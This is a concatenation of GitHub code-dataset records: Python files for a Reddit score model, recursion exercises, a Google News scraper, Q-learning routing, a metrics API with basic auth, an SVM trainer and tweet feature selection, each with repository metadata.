Try Again')\n continue\n\n","repo_name":"silver-or/melbourne-django","sub_path":"hello/quiz00.py","file_name":"quiz00.py","file_ext":"py","file_size_in_byte":8416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13362611251","text":"import pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer \nfrom sklearn.preprocessing import StandardScaler\nfrom scipy.sparse import hstack\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import Ridge,LinearRegression\nfrom sklearn.metrics import r2_score,accuracy_score\nimport joblib\nimport numpy as np\nfrom VADdet import analyze\n\npath = \"../files/new_train_test/new_Train_data.csv\"\n\ndata = pd.read_csv(path)\ncalculated = pd.DataFrame(columns=['actual_score','hour_pred'])\n\ndata_removed = data.drop(['redditor','type','text','proc_text','proc_title','genre','absolute_words_ratio','neg_log_prob_aw_ratio'],axis = 1)\n\ndata_removed = data_removed.dropna(subset = ['title','subreddit','datetime','valence','arousal','dominance','hour'])\n\ntrain_x ,y = data_removed.drop('score',axis = 1), data_removed[['score']]\n\ntfidf_subreddit = TfidfVectorizer(ngram_range=(1, 1), max_features=None)\nsubreddit_sparse = tfidf_subreddit.fit_transform(train_x['subreddit'])\n\n\n#changing ngram range \ntfidf_title = TfidfVectorizer(ngram_range=(2, 5), max_features=None)\ntitle_sparse = tfidf_title.fit_transform(train_x['title'])\n\nhour = train_x[['hour']]\nvalence = train_x[['valence']]\narousal = train_x[['arousal']]\ndominance = train_x[['dominance']]\n\nscaler = StandardScaler()\nscaled_date = scaler.fit_transform(hour)\nscaled_val = np.hstack([scaled_date,valence,arousal,dominance])\n\ntrain_x_sparse = hstack([title_sparse,subreddit_sparse,scaled_val])\nprint(\"\\t ############ TRAINING MODEL ############\")\n# train_y = train_y.astype('int')\n\nml_model = MLPClassifier(max_iter=45,hidden_layer_sizes = (35,),verbose = True) \n #Ridge(alpha = 0.0001)\n #MLPClassifier(max_iter=30,hidden_layer_sizes = (25,5,),verbose = True)\n #LinearRegression()\nml_model.fit(train_x_sparse,y.values.ravel())\njoblib.dump(ml_model, 'mlp_hour.joblib')\n\nprint(ml_model.score(train_x_sparse, y)) \n\nprint(\"\\t ############ TRAINING COMPLETE ############\")\n\n# ml_model = joblib.load(\"mlp_hour.joblib\")\n######################### TESTING #########################\ntest_data = pd.read_csv(\"../files/new_train_test/finaltest_data.csv\")\n\ntest_data_removed = test_data.drop(['redditor','type','text','proc_text','proc_title','genre','absolute_words_ratio','neg_log_prob_aw_ratio'],axis = 1)\n\ntest_data_removed = test_data_removed.dropna(subset = ['title','subreddit','datetime','valence','arousal','dominance','hour'])\n\ntest_x, test_y = test_data_removed.drop('score',axis = 1), test_data_removed[['score']]\n\nsub_sparse = tfidf_subreddit.transform(test_x['subreddit'])\ntit_sparse = tfidf_title.transform(test_x['title'])\n\ntest_date_time = test_x[['hour']]\ntest_valence = test_x[['valence']]\ntest_arousal = test_x[['arousal']]\ntest_dominance = test_x[['dominance']]\ntest_date = scaler.transform(test_date_time)\n# print(test_date)\ntest_scaled_val = np.hstack([test_date,test_valence,test_arousal,test_dominance])\n\ntest_x_sparse = hstack([tit_sparse, sub_sparse, test_scaled_val])\n\npred_y = 
ml_model.predict(test_x_sparse)\nprint(pred_y)\n\n","repo_name":"Neel-G-png/reddit-post-outreach-prediction","sub_path":"hour_model/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":3126,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"25454188144","text":"\"Returns factorial of a number n\"\n\n\ndef factorial(n):\n if n == 0:\n return 1\n return n * factorial(n - 1)\n\n\n\"Returns n-th Fibonacci sequence number\"\n\n\ndef fibonacci(n):\n if n == 1 or n == 2:\n return 1\n return fibonacci(n-1) + fibonacci(n-2)\n\n\n\"Returns the sum of digits of number n\"\n\n\ndef digitsum(n):\n if n // 10 == 0:\n return n\n return n % 10 + digitsum(n // 10)\n\n\n\"Returns Ackermann number\"\n\n\ndef ackermann(m, n):\n if m == 0:\n return n+1\n if n == 0:\n return ackermann(m - 1, 1)\n return ackermann(m - 1, ackermann(m, n - 1))\n\n\n\"Returns a greatest common multiple of a and b\"\n\n\ndef gcd(a, b):\n if b == 0:\n return a\n return gcd(b, a % b)\n\n\n\"Returns reversed string s\"\n\n\ndef reversestring(s):\n if len(s) <= 1:\n return s\n return s[-1] + reversestring(s[0:-1])\n\n\n\"Returns a True if n is a 2 to some power\"\n\n\ndef istwopower(n):\n if n <= 0:\n return False\n if n == 1:\n return True\n if n % 2 == 0:\n return istwopower(n // 2)\n return False\n\n\n\"Returns list of all binary strings of lenght n\"\n\n\ndef genbinarystrings(n):\n if n == 0:\n return ['']\n if n == 1:\n return ['0', '1']\n list = []\n for i in genbinarystrings(1):\n for j in genbinarystrings(n - 1):\n list.append(i + j)\n return list\n\n\n\"\"\"Returns an integer that is equal to a decimal representation of concatenated\na and b\"\"\"\n\n\ndef concatnumbers(a, b):\n if b // 10 == 0:\n return a * 10 + b\n return concatnumbers(a, b // 10) * 10 + b % 10\n\n\n\"Returns string s with parentheses\"\n\n\ndef parentheses(s):\n if len(s) <= 2:\n return '(' + s + ')'\n return '(' + s[0] + parentheses(s[1: -2 + 1]) + s[-1] + ')'\n\n\n\"\"\"Returns palyndrom that increases in first part from 1 to n and decreases in\nthe second part from n to 1\"\"\"\n\n\ndef abacaba(n):\n if n == 1:\n return [1]\n return abacaba(n - 1) + [n] + abacaba(n - 1)\n","repo_name":"dnemirich/python_course","sub_path":"Task4.py","file_name":"Task4.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20673493295","text":"from datetime import datetime, timedelta\nfrom unidecode import unidecode\nimport multiprocessing\nfrom concurrent.futures import ThreadPoolExecutor\nimport os\n\ntry:\n from src.utils import getHTTPResponse\nexcept:\n from utils import getHTTPResponse\n\nclass New:\n def __init__(self, topic=''):\n self.new_id = 0\n self.title = ''\n self.topic = topic\n self.topic_id = 0\n self.newspaper = ''\n self.newspaper_id = 0\n self.url = ''\n self.publish_date = '00-00-00 00:00:00'\n self.antique = ''\n # Campos que no van en la base de datos\n self.html_content = ''\n\n def to_dicc(self):\n return {\n 'new_id' : self.new_id,\n 'title' : self.title,\n 'topic' : self.topic,\n 'topic_id' : self.topic_id,\n 'newspaper' : self.newspaper,\n 'newspaper_id' : self.newspaper_id,\n 'url' : self.url,\n 'publish_date' : self.publish_date,\n 'antique' : self.antique,\n }\n\nclass GoogleNew(New):\n def __init__(self, topic=''):\n super().__init__(topic=topic)\n\n def fetch_data(self):\n\n try:\n self.newspaper = self.html_content.find('div', class_='MgUUmf 
NUnG9d').text\n self.newspaper = unidecode( self.newspaper ) # Quito los acentos\n self.newspaper = self.newspaper.replace('\\n','')\n self.newspaper = self.newspaper.replace('\"', '')\n self.newspaper = self.newspaper.replace(\"'\", '')\n except:\n self.newspaper = ''\n\n try:\n self.title = self.html_content.find('div', class_='n0jPhd ynAwRc MBeuO nDgy9d').text\n self.title = unidecode( self.title ) # Quito los acentos\n self.title = self.title.replace('\\n','')\n self.title = self.title.replace('\"', '')\n self.title = self.title.replace(\"'\", '')\n except:\n self.title = self.html_content.find('div', class_='n0jPhd ynAwRc tNxQIb nDgy9d').text\n\n try:\n self.antique = self.html_content.find('div', class_='OSrXXb rbYSKb LfVVr').text\n except:\n self.antique = self.html_content.find('div', class_='OSrXXb rbYSKb').text\n self.antique = unidecode( self.antique ) # Quito los acentos\n\n # Busco la URL de la noticia\n try:\n self.url = self.html_content.find('a').get('href')\n except:\n self.url = ''\n\n # Obtengo los datos de fecha\n self.get_google_date()\n\n def get_google_date(self):\n \"\"\" \"\"\"\n # Reemplazar meses\n self.antique = self.antique.replace('ene', 'jan')\n self.antique = self.antique.replace('abr', 'apr')\n self.antique = self.antique.replace('ago', 'aug')\n self.antique = self.antique.replace('sept', 'sep')\n self.antique = self.antique.replace('dic', 'dec')\n\n # Validar que la cadena de texto sea válida\n if 'hace' not in self.antique:\n date_obj = datetime.strptime(self.antique, \"%d %b %Y\")\n date = date_obj.strftime(\"%d-%m-%Y\")\n return f'{date} 12:00:00'\n\n # Obtener el número y la unidad de tiempo de la cadena\n cantidad, unidad = self.antique.split()[1:]\n cantidad = int(cantidad)\n\n # Obtener la fecha actual\n cdate = datetime.now()\n\n # Calcular la fecha de publicación restando la cantidad de tiempo adecuada\n if 'minuto' in unidad:\n date = cdate - timedelta(minutes=cantidad)\n elif 'hora' in unidad:\n date = cdate - timedelta(hours=cantidad)\n elif 'dia' in unidad:\n date = cdate - timedelta(days=cantidad)\n elif 'semana' in unidad:\n date = cdate - timedelta(days=cantidad * 7) # Suponiendo 30 días por mes\n elif 'mes' in unidad:\n date = cdate - timedelta(days=cantidad * 30) # Suponiendo 30 días por mes\n elif 'año' in unidad:\n date = cdate - timedelta(days=cantidad * 365) # Suponiendo 365 días por año\n\n self.publish_date = '{} {}'.format(\n date.date().strftime(\"%d-%m-%Y\"),\n date.time().strftime(\"%H:%M:%S.%f\")[:-7]\n )\n\nclass GoogleSearch:\n def __init__(self, topics=[], enable_MP=True, verbose=True):\n self.topics = topics\n self.enable_MP = enable_MP\n self.verbose = verbose\n self.news_dicc = {}\n self.news = []\n\n def fetch_news(self):\n \"\"\" \"\"\"\n #\n if self.topics == None:\n print('Se omitio la obtencion de noticias...')\n print('La lista de temas esta vacia')\n return {} # Devuelvo un diccionario vacio\n\n # Ejecuto el codigo en paralelo o serie\n if self.enable_MP is True:\n self.fetch_news_from_topic_MP()\n else:\n self.fetch_news_from_topic()\n\n return self.news_dicc\n\n def fetch_news_from_topic(self):\n \"\"\"Obtencion de noticias de la forma serie\"\"\"\n # Obtengo las noticias para cada tematica\n for topic in self.topics:\n self.fetch_topic_news(topic=topic)\n\n def fetch_news_from_topic_MP(self, version=1):\n \"\"\"Obtencion de noticias de la forma paralela\"\"\"\n # Defino el numero de threads que puede usar el procesador\n # UPor defecto voy a utilizar la mitad de los hilos\n # disponibles\n nthreads = max(1, 
os.cpu_count() // 2)\n\n ############################################################\n # Esta version espera que todos los procesos terminen\n # antes de continuar con la ejecucion del programa\n ############################################################\n if version == 1:\n # Creo una lista para almacenar los procesos\n threads = []\n\n # Completo el diccionario utilizando ThreadPoolExecutor\n with ThreadPoolExecutor(max_workers=nthreads) as executor:\n for topic in self.topics:\n thread = executor.submit(self.fetch_topic_news, topic)\n threads.append(thread)\n\n # Esperar a que todos los hilos finalicen\n for thread in threads:\n thread.result()\n\n ############################################################\n # Esta version NO espera que todos los procesos terminen\n # antes de continuar con la ejecucion del programa\n ############################################################\n elif version == 2:\n # Creo una lista para almacenar los procesos\n processes = []\n\n # Completo el diccionario utilizando Process\n for topic in self.topics:\n process = multiprocessing.Process(target=self.fetch_topic_news, args=(topic,))\n processes.append(process)\n process.start()\n\n # Esperar a que todos los procesos finalicen\n for process in processes:\n process.join()\n\n def fetch_topic_news(self, topic = 'Netflix'):\n \"\"\"Obtener las noticias mas relevantes en Google sobre un tema dado\"\"\"\n\n print('- Looking news for topic:', topic)\n\n # Reemplazo los espacios por signos + para ejecutar la busqueda\n rtopic = topic.replace(' ','+')\n\n # Defino la URL\n url = f'https://www.google.com/search?q={rtopic}&tbm=nws'\n\n # Respuesta del servidor\n response = getHTTPResponse(url, headers = None)\n\n # Obtengo las noticias\n # Intento primero obtener la noticia con el href incluido\n # Si no lo encuentro, busco otra division mas abajo\n html_news = response.find_all('div', class_=['CA8QAA','SoaBEf','xCURGd'])\n if html_news is None:\n html_news = response.find_all('div', class_=['iRPxbe','g5wfEd'])\n\n # Muestro las noticias\n for k, html_new in enumerate(html_news):\n new = GoogleNew(topic=topic)\n new.html_content = html_new\n new.fetch_data()\n\n # Agrego la noticia\n self.news.append( new )","repo_name":"santinieto/latinframe_soft","sub_path":"src/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":8065,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13897547382","text":"\nimport sys\ninp = input().split()\nn=int(inp[0])\nk=int(inp[1])\nlll=input().split()\nls=[int(i) for i in lll]\nfstore={}\nbstore={}\nsys.setrecursionlimit(3*n)\ndef forward(i):\n\tres=0\n\tif i==n-1:\n\t\treturn ls[n-1]\n\telif i==n-2:\n\t\treturn ls[n-2]+forward(i+1)\n\telif i in fstore:\n\t\tres=fstore[i]\n\telse:\n\t\tfstore[i]=max(ls[i]+forward(i+1),ls[i]+forward(i+2))\n\t\tres=fstore[i]\n\treturn res\ndef back(j):\n\tif j==0:\n\t\treturn ls[0]\n\telif j==1:\n\t\treturn ls[1]+back(j-1)\n\telif j in bstore:\n\t\treturn bstore[j]\n\telse:\n\t\tbstore[j]= max(ls[j]+back(j-1),ls[j]+back(j-2))\n\t\treturn bstore[j]\n\na=forward(k-1)-ls[k-1]\nb=back(n-1)-ls[n-1]\n# print('a:',a)\n# print('b:',b)\nprint(a+b)","repo_name":"Shubhamsharda/Competetive-Programming","sub_path":"calvin's game.py","file_name":"calvin's game.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"544527259","text":"import random\r\nfrom get_all_routes import get_best_nodes, 
get_route\r\n#from get_all_routes import get_best_nodes, get_best_net, get_all_best_routes, get_cost, count_routes, get_route\r\nimport numpy as np\r\n\r\ndef update_Q(T,Q,current_state, next_state, alpha):\r\n current_t = T[current_state][next_state]\r\n current_q = Q[current_state][next_state]\r\n \r\n #updating SARSA\r\n # best_next_action_val = min(Q[next_state].values())\r\n # for action in Q[next_state].keys():\r\n # if Q[next_state][action] == best_next_action_val:\r\n # best_next_action = action\r\n # # print(best_next_action)\r\n # new_q = current_q + alpha * (current_t + gamma * Q[next_state][best_next_action] - current_q) #for each state, it will choose the minimun furture cost instead of maximum future reward SARSA\r\n\r\n #updating Q-learning\r\n new_q = current_q + alpha * (current_t + min(Q[next_state].values()) - current_q) #for each state,\r\n #it will choose the minimun furture cost instead of maximum future reward.\r\n Q[current_state][next_state] = new_q\r\n return Q\r\n\r\ndef get_key_of_min_value(dic):\r\n min_val = min(dic.values())\r\n return [k for k, v in dic.items() if v == min_val]\r\n\r\ndef Q_routing(T,Q,alpha,epsilon,n_episodes,start,end): #Fill Q table and explore all options\r\n #--------------e-greedy decay---------------------------------\r\n # min_epsilon = 0.01\r\n # max_epsilon = 0.9\r\n # decay_rate = 0.001\r\n episode_hops = {}\r\n \r\n routes_complete = []\r\n for i in range(n_episodes):\r\n routes_complete.append([])\r\n\r\n #T is network info\r\n for e in range(1,n_episodes+1): #per ogni episodio\r\n # print(\"Episode {0}:\".format(e))\r\n current_state = start\r\n goal = False\r\n stored_states = []\r\n\t\r\n #print(\"Prima dell'update, episodio \", e, \"\\n\",Q)\r\n while not goal:\r\n #takes the next hops neighbours for state\r\n valid_moves = list(Q[current_state].keys())\r\n \r\n if len(valid_moves) <= 1: #se c'è solo un neighbour il prossimo stato è per forza quello\r\n next_state = valid_moves[0]\r\n else:\r\n #scegli la best action tra quelle che in questo stato minimizzano il Q value\r\n best_action = random.choice(get_key_of_min_value(Q[current_state]))\r\n if random.random() < epsilon:\r\n next_state = best_action\r\n else:\r\n valid_moves.pop(valid_moves.index(best_action)) #togli da valid moves quella che ha come indice la best \r\n \t\t\t\t\t#action scelta a caso prima tra quelle col minor Q value\r\n next_state = random.choice(valid_moves) #scegli a caso tra quelle rimanenti tra le mosse valide\r\n Q = update_Q(T,Q,current_state, next_state, alpha) #update Q Table\r\n current_state = next_state\r\n # print(next_state)\r\n stored_states.append(next_state)\r\n\r\n if next_state in end:\r\n goal = True\r\n \r\n \r\n ##QUI DEVO STAMPARE LA REWARD DI FINE EPISODIO PER UNA COPPIA SRC/DST\r\n \r\n #print(\"Dopo l'update, episodio \",e,\"\\n\", Q)\r\n nodes = get_best_nodes(Q,start,end) #get best nodes to reach dest\r\n route = get_route(Q, start, end)\r\n \r\n routes_complete[e-1] = route\r\n \r\n #print(\"\\nepisodio: \", e, \" \", route) \r\n \r\n \r\n \t\r\n \r\n \r\n # print('Q-table:', Q)\r\n # print('Switches', stored_states)\r\n # episode_hops[e] = stored_states\r\n # print('resume',episode_hops)\r\n # name = '~/ryu/ryu/SDNapps_proac/RoutingGeant/stretch/Graphs_parameters/alpha_'+str(alpha)+'/'+str(it)+'_alpha_'+str(alpha)+'_epsilon_'+str(epsilon)+'_'\r\n\r\n # with open(str(name)+'hops_episodes.json', 'w') as json_file:\r\n # json.dump(episode_hops, json_file, indent=1)\r\n \r\n #--------------e-greedy 
decay---------------------------------\r\n # e += 1\r\n # epsilon = min_epsilon + (max_epsilon - min_epsilon)*np.exp(-decay_rate*e)\r\n # print epsilon\r\n return Q, epsilon, routes_complete\r\n","repo_name":"gabrispa/controllerML","sub_path":"RoutingGeant/Q_routing.py","file_name":"Q_routing.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"9921904881","text":"from typing import List\n\n\ndef containsDuplicate(self, nums: List[int]) -> bool:\n hash = {}\n for i in range(len(nums)):\n if nums[i] in hash:\n hash[nums[i]] += 1\n else:\n hash[nums[i]] = 1\n if hash[nums[i]] > 1:\n return True\n return False\n\n\nnums = [2, 2, 11, 15]\nans = containsDuplicate(0, nums)\nprint(ans)\n","repo_name":"baszabilsal/LeetCode_DataStructureAndAlgorithm","sub_path":"DataStructure/217_containsDuplicate/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"29583324802","text":"import apps.models\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"log_search\", \"0032_featuretoggle\"),\n ]\n\n operations = [\n migrations.CreateModel(\n name=\"IndexSetTag\",\n fields=[\n (\"tag_id\", models.AutoField(primary_key=True, serialize=False, verbose_name=\"标签id\")),\n (\"name\", models.CharField(max_length=255, unique=True, verbose_name=\"标签名称\")),\n (\n \"color\",\n models.CharField(\n choices=[\n (\"red\", \"red\"),\n (\"yellow\", \"yellow\"),\n (\"blue\", \"blue\"),\n (\"green\", \"green\"),\n (\"gray\", \"gray\"),\n ],\n default=\"green\",\n max_length=255,\n verbose_name=\"配色\",\n ),\n ),\n ],\n options={\n \"verbose_name\": \"标签表\",\n \"verbose_name_plural\": \"标签表\",\n },\n ),\n migrations.AddField(\n model_name=\"logindexset\",\n name=\"tag_ids\",\n field=apps.models.MultiStrSplitByCommaField(default=\"\", max_length=255, verbose_name=\"标签id记录\"),\n ),\n migrations.CreateModel(\n name=\"IndexSetUserFavorite\",\n fields=[\n (\"id\", models.AutoField(primary_key=True, serialize=False, verbose_name=\"id\")),\n (\"index_set_id\", models.IntegerField(verbose_name=\"索引集id\")),\n (\"username\", models.CharField(max_length=255, verbose_name=\"用户name\")),\n ],\n options={\n \"verbose_name\": \"检索收藏记录\",\n \"verbose_name_plural\": \"33_搜索-检索收藏记录\",\n \"unique_together\": {(\"index_set_id\", \"username\")},\n },\n ),\n ]\n","repo_name":"TencentBlueKing/bk-log","sub_path":"apps/log_search/migrations/0033_auto_20210528_1655.py","file_name":"0033_auto_20210528_1655.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"53"}
{"seq_id":"20048894122","text":"import os\nimport sys\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import svm\nfrom sklearn import metrics\nimport pickle\n\nif len(sys.argv) < 2:\n print(\"no input csv file\")\n exit(0)\n\n\n\ndf = pd.read_csv(sys.argv[1])\n\n# print(df, df.columns[0:len(df.columns)])\n\nxcols = [ i for i in df.columns]\ntarg = xcols.pop()\n# print(xcols)\nX = df.loc[:,xcols ].values\nprint(X.shape)\nY = df.loc[:,targ].values\nprint(Y.shape)\n\nX = StandardScaler().fit_transform(X)\nprint(X)\n# pca = PCA(n_components=128)\n# pcaofX = pca.fit_transform(X)\n# print(\"shapeofX after 
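The `update_Q` step in the Q-routing record above is the standard cost-minimizing variant of Q-learning: the one-step lookahead uses `min` over the next state's Q values rather than `max`. A minimal worked example, assuming the same nested-dict layout for `T` and `Q`; all numbers are illustrative:

```python
# Worked example of the cost-minimizing update in update_Q above;
# the table values and alpha are illustrative, not taken from the project.
alpha = 0.5
T = {"A": {"B": 4.0}}                              # link cost from A to B
Q = {"A": {"B": 10.0}, "B": {"C": 2.0, "D": 6.0}}

# Q(A,B) <- Q(A,B) + alpha * (cost(A,B) + min_a' Q(B,a') - Q(A,B))
Q["A"]["B"] += alpha * (T["A"]["B"] + min(Q["B"].values()) - Q["A"]["B"])
print(Q["A"]["B"])  # 8.0: moves halfway from 10 toward the lookahead target 4 + 2 = 6
```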
pca\",pcaofX.shape, \", cum Sum of variance ratio\",pca.explained_variance_ratio_.cumsum()[-1])\n\npcaofX = X\n\nX_train, X_test, Y_train, Y_test = train_test_split(pcaofX, Y, test_size=0.1,random_state=109)\n\nprint(X_train.shape)\n\nsvm_model = svm.SVC(kernel=\"linear\")\nsvm_model.fit(X_train,Y_train)\n\npred = svm_model.predict(X_test)\nprint(pred)\n\nprint(\"Accuracy:\",metrics.accuracy_score(Y_test, pred))\n\n\npickle.dump(svm_model, open(\"svm_model.sav\", 'wb'))\n\n","repo_name":"jha11aditya/facial_recognition","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35269019092","text":"import functools\nimport base64\n\nfrom urlparse import parse_qs as _parse_qs\n\nfrom twisted.internet.defer import maybeDeferred, inlineCallbacks\n\nfrom confmodel import Config\nfrom confmodel.fields import ConfigDict\n\nfrom go_api.cyclone.handlers import ApiApplication, BaseHandler\nfrom cyclone.web import HTTPAuthenticationRequired\n\nfrom go_metrics.metrics.base import MetricsBackendError, BadMetricsQueryError\nfrom go_metrics.metrics.graphite import GraphiteBackend\n\n\ndef parse_qs(qs):\n return dict(\n (k, v[0] if len(v) == 1 else v)\n for (k, v) in _parse_qs(qs).iteritems())\n\n\ndef HTTPBasic(method):\n @functools.wraps(method)\n def wrapper(self, *args, **kwargs):\n backend = self.model.backend\n config = backend.config\n if not (getattr(config, 'basicauth_username', None) and\n getattr(config, 'basicauth_password', None)):\n return method(self, *args, **kwargs)\n\n msg = \"Authentication Required\"\n if \"Authorization\" in self.request.headers:\n try:\n auth_type, data = self.request.headers[\"Authorization\"].split()\n if auth_type == \"Basic\":\n usr, pwd = base64.b64decode(data).split(\":\", 1)\n if (usr == config.basicauth_username and\n pwd == config.basicauth_password):\n self._current_user = usr\n return method(self, *args, **kwargs)\n msg = \"Authentication Failed\"\n except (ValueError, TypeError):\n # NOTE: ValueError for when the split() doesn't work\n # TypeError for when the data isn't base64 decodeable\n msg = \"Invalid Authorization header\"\n\n raise HTTPAuthenticationRequired(\n log_message=msg, auth_type=\"Basic\", realm=\"Metrics API\")\n\n return wrapper\n\n\nclass MetricsHandler(BaseHandler):\n\n @HTTPBasic\n def get(self):\n query = parse_qs(self.request.query)\n d = maybeDeferred(self.model.get, **query)\n d.addCallback(self.write_object)\n d.addErrback(self.catch_err, 400, BadMetricsQueryError)\n d.addErrback(self.catch_err, 500, MetricsBackendError)\n d.addErrback(self.raise_err, 500, \"Failed to retrieve metrics.\")\n return d\n\n def _assert_dict(self, d):\n if not isinstance(d, dict):\n raise BadMetricsQueryError(\n \"Invalid query %r, should be dict, not %s\" % (d, type(d)))\n\n @HTTPBasic\n def post(self):\n data = self.parse_json(self.request.body)\n d = maybeDeferred(self._assert_dict, data)\n d.addCallback(lambda _: self.model.fire(**data))\n d.addCallback(self.write_object)\n d.addErrback(self.catch_err, 400, BadMetricsQueryError)\n d.addErrback(self.raise_err, 500, \"Failed to fire metrics.\")\n return d\n\n\nclass MetricsApiConfig(Config):\n backend = ConfigDict(\"Config for metrics backend\", default={})\n\n\nclass MetricsApi(ApiApplication):\n config_required = True\n backend_class = GraphiteBackend\n\n @property\n def models(self):\n return (('/metrics/', MetricsHandler, self.get_metrics_model),)\n\n def 
initialize(self, settings, config):\n config = MetricsApiConfig(config)\n self.backend = self.backend_class(config.backend)\n\n @inlineCallbacks\n def teardown(self):\n yield self.backend.teardown()\n\n def get_metrics_model(self, owner_id):\n return self.backend.get_model(owner_id)\n","repo_name":"praekelt/go-metrics-api","sub_path":"go_metrics/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"42725707164","text":"\nopcion=\"\";cantidad=0\nhinchas=[]\nwhile opcion !=\"0\":\n respuesta=\"S\"\n print(\"[1] Ingresar hincha\\n[2] Ver listado\\n[0] Salir\")\n opcion=input(\"Ingrese la opción: \")\n if opcion ==\"1\":\n while respuesta.upper() ==\"SI\" or respuesta.upper() ==\"S\":\n rut=input(\"Ingrese el rut: \")\n ingreso=input(\"Permite el ingreso del hincha: [SI] o [NO]\")\n if ingreso.upper() ==\"SI\" or ingreso.upper() ==\"S\":\n if rut in hinchas: \n print(\"\\n\\n*******************\\n La persona ya ingreso \\n*******************\\n\") \n else:\n cantidad+=1\n hinchas.append(rut)\n print(\"Ingresado\")\n else: \n print(\"ACCESO DENEGADO!!!\")\n input(\"\")\n respuesta=input(\"\\nDesea ingresar otro hincha [SI] o [NO]: \")\n elif opcion ==\"2\":\n print(\"Listado de hinchas que ingresaron\")\n for hincha in hinchas:\n print(hincha)\n input(\"\")\n elif opcion ==\"\" or opcion.isalpha()==True or int(opcion) < 0 or int(opcion) >= 3:\n print(\"Opcion elegida no es valida\")\n input(\"Presione cualquier tecla para continuar.....\\n\")\n else:\n print(\"Hasta Pronto!!!\")","repo_name":"Tanner1983/Modulo2-Actividades-10-18","sub_path":"act14-03.py","file_name":"act14-03.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"20429862747","text":"class Solution:\n def containsNearbyDuplicate(self, nums: List[int], k: int) -> bool:\n if len(set(nums))==len(nums): return False \n for i in range(len(nums)-k+2):\n window = nums[i:i+k+1]\n if len(set(window)) < len(window):\n return True\n return False\r\n#-------------------------------------------------------------------------------\r\nimport pandas as pd\r\nimport csv\r\nimport re\r\nimport nltk\r\nimport networkx as nx\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem import PorterStemmer as PS\r\nimport numpy as np\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.preprocessing import OrdinalEncoder\r\nimport operator\r\nimport math\r\nimport preprocessor as p\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.feature_selection import SelectKBest\r\nfrom sklearn.preprocessing import normalize\r\nfrom sklearn.feature_selection import chi2\r\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report\r\nimport pandas as pd\r\n\r\ntopnum=30\r\n# prepare input data\r\ndef prepare_inputs(X_train, X_test):\r\n\toe = OrdinalEncoder()\r\n\toe.fit(X_train)\r\n\tX_train_enc = oe.transform(X_train)\r\n\tX_test_enc = oe.transform(X_test)\r\n\treturn X_train_enc, X_test_enc\r\n\r\n#prepare targets\r\ndef prepare_targets(y_train, y_test):\r\n\tle = LabelEncoder()\r\n\tle.fit(y_train)\r\n\ty_train_enc = le.transform(y_train)\r\n\ty_test_enc = le.transform(y_test)\r\n\treturn y_train_enc, y_test_enc\r\n\r\ndef select_features(X_train, y_train, X_test):\r\n\r\n\tfs = 
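The `HTTPBasic` wrapper in the go-metrics server above accepts an `Authorization: Basic <base64("user:password")>` header. A small sketch of what a client would send, with placeholder credentials:

```python
# Sketch of the header format the HTTPBasic decorator expects;
# the credentials are placeholders.
import base64

user, password = "alice", "secret"
token = base64.b64encode("{}:{}".format(user, password).encode("utf-8")).decode("ascii")
headers = {"Authorization": "Basic " + token}
print(headers)  # {'Authorization': 'Basic YWxpY2U6c2VjcmV0'}
```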
SelectKBest(score_func=chi2, k=500)\r\n\tfs.fit(X_train, y_train)\r\n\tX_train_fs = fs.transform(X_train)\r\n\tX_test_fs = fs.transform(X_test)\r\n\r\n\treturn X_train_fs, X_test_fs, fs\r\n\r\n\r\ndef do_transform(X_test, all_features):\r\n print(type(X_test))\r\n df = pd.DataFrame(columns=all_features.keys())\r\n print(df)\r\n\r\n features_setoftweets=[]\r\n for anything in X_test:\r\n listofwords=anything.split()\r\n each_tweet_1=anything.split()\r\n\r\n for i in range(0, len(each_tweet_1)-1):\r\n listofwords.append(str(each_tweet_1[i]+' '+ each_tweet_1[i+1]))\r\n features_setoftweets.append(listofwords)\r\n\r\n\r\n\r\n full_featureset=[]\r\n for each_feature in features_setoftweets:\r\n everytweet_featureset=dict()\r\n for each_word in each_feature:\r\n\r\n temp_each_word=each_word.split()\r\n\r\n if len(temp_each_word)==1:\r\n try:\r\n everytweet_featureset[each_word]=all_features[each_word]\r\n except:\r\n continue\r\n if len(temp_each_word)==2:\r\n\r\n try:\r\n everytweet_featureset[each_word]=all_features[str(each_word)]\r\n except:\r\n continue\r\n\r\n df=df.append(everytweet_featureset, 